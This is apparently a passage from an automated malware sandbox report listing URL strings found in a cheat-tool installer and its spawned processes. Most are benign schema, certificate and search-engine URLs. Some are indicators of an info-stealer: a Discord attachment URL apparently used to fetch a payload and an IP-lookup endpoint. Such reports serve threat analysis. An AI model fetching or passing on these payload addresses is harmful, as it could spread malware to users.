                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.drString found in binary or memory: http://t2.symcb.com0
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002C5D000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002C75000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3ResponseD
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.drString found in binary or memory: http://tl.symcb.com/tl.crl0
                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.drString found in binary or memory: http://tl.symcb.com/tl.crt0
                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.drString found in binary or memory: http://tl.symcd.com0&
                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: connect.exe, connect.exe, 00000016.00000002.2135618138.0000000003ABE000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2135618138.000000000402B000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2114701460.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2112585843.0000000002F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                    Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB34A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/
                    Source: LuaJIT.exe, 00000009.00000003.1935036216.0000022EB5AC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1166694393298817025/1171047481182793729/2.txt
                    Source: connect.exe, connect.exe, 00000016.00000002.2135618138.0000000003ABE000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2135618138.000000000402B000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2114701460.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2112585843.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp
                    String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: connect.exe, connect.exe, 00000016.00000002.2135618138.0000000003ABE000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2135618138.000000000402B000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2114701460.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2112585843.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp
                    String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003ABE000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2135618138.000000000402B000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2114701460.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2112585843.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp
                    String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003ABE000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2135618138.000000000402B000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2114701460.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2112585843.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp
                    String found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: connect.exe, 00000016.00000002.2135618138.000000000402B000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2114701460.0000000002F03000.00000004.00000800.00020000.00000000.sdmp
                    String found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003ABE000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2112585843.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp
                    String found in binary or memory: https://duckduckgo.com/chrome_newtabS
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003ABE000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2135618138.000000000402B000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2114701460.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2112585843.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp
                    String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: LuaJIT.exe.2.dr
                    String found in binary or memory: https://luajit.org/
                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.dr
                    String found in binary or memory: https://www.advancedinstaller.com
                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.dr
                    String found in binary or memory: https://www.digicert.com/CPS0
                    Source: connect.exe
                    String found in binary or memory: https://www.ecosia.org/new
                    Source: connect.exe
                    String found in binary or memory: https://www.ecosia.org/newt
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003ABE000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2135618138.000000000402B000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2114701460.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2112585843.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp
                    String found in binary or memory: https://www.ecosia.org/newtab/
                    Source: connect.exe, connect.exe, 00000016.00000002.2135618138.0000000003ABE000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2135618138.000000000402B000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2114701460.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2112585843.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp
                    String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
